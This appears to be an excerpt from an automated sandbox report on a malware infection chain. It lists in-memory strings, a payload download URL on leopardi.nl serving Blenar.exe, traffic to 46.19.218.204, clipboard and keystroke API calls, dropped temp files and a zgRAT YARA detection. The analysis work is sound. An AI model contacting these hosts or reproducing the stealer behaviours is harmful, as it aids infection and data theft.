                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                                    Source: Amcache.hve.21.drString found in binary or memory: http://upx.sf.net
                                    Source: 66ed86be077bb_12.exe.27.drString found in binary or memory: https://aka.ms/AA21ue1#ValidationVisitor
                                    Source: gold.exe, 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                                    Source: axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drString found in binary or memory: https://sectigo.com/CPS0
                                    Source: 66ed86be077bb_12.exe.27.drString found in binary or memory: https://tools.ietf.org/html/rfc4918#section-11.2chttps://tools.ietf.org/html/rfc7231#section-6.5.8ch
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/-
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/F
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000001B.00000002.3771286465.0000000001623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exe
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exe-8
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exeC
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exeR8$
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exew8A
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exey
                                    Source: 6dbb7bdf47.exe, 00000011.00000002.3766355636.0000000001038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                                    Source: unknownHTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49925 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49931 version: TLS 1.2
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,17_2_00E6EAFF
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00E6ED6A
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,17_2_00E6EAFF
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,17_2_00E5AA57
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_00E89576
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp1F00.tmpJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp1F11.tmpJump to dropped file

                                    System Summary

                                    barindex
                                    Malicious sample detected (through community Yara rule)
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPEDMatched rule: Detects zgRAT Author: ditekSHen
                                    .NET source code contains very large array initializations
                                    Source: crypted[1].exe.27.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 311296
                                    Source: crypted.exe.27.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 311296
                                    Binary is likely a compiled AutoIt script file
                                    Source: 6dbb7bdf47.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                                    Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_146723aa-9
